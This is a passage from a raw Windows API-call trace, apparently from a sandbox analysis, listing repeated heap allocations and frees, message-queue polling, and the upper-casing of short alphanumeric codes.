0x24a9708 [0165.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0165.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0165.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0165.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0165.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0165.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0165.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0165.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0165.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0090 [0165.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0165.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0165.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0165.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0165.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0165.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0165.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0165.614] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0165.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0165.614] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0165.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0165.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0165.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9708 [0165.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0165.614] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0165.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0165.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0165.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0165.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0165.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0165.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0165.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0165.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0165.615] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0165.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0165.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0165.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0165.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0165.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0165.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0165.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0165.615] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0165.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0165.615] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0165.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0165.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0165.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0165.615] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0165.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0165.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa760 [0165.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0165.616] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0165.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0165.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0165.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0165.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00c0 [0165.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0165.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0165.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00c0 [0165.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0165.616] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0165.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0165.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0165.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0165.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0165.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0165.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0165.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0165.616] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0165.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0165.617] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0165.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0165.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0165.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0165.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00c0 [0165.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0165.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0165.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0165.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0165.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0165.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0165.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0165.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0165.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0165.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0165.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0165.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0165.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0165.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0165.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0165.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0165.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0165.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0165.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0165.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0165.618] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0165.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0165.618] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0165.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0165.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0165.618] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0165.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0165.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0165.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa760 [0165.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0165.618] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0165.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0165.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0165.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0165.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0165.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0165.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0165.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0165.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0165.619] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0165.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0165.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0165.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0165.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0165.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0165.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0165.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0165.619] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0165.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0165.619] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0165.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0165.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0165.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0165.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0165.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0165.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0165.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0165.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0165.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0165.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0165.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0165.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0165.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0165.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0165.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0165.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0165.620] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0165.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0165.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0165.621] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0165.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0165.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0165.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0165.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0165.621] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0165.621] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0165.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0165.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0165.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0165.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0165.621] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0165.621] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0165.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0165.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0165.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0165.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0165.622] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0165.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0165.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0165.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa460 [0165.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0165.622] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0165.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0165.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00c0 [0165.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0165.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0165.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00d0 [0165.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0165.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0165.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00d0 [0165.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0165.623] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0165.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0165.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0165.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0165.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0165.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0165.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0165.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0165.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0165.623] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0165.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0165.623] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0165.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0165.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00c0 [0165.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0165.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0165.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00d0 [0165.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0165.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0165.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0165.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0165.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0165.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0165.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0165.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0165.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0165.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0165.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.624] RtlAllocateHeap 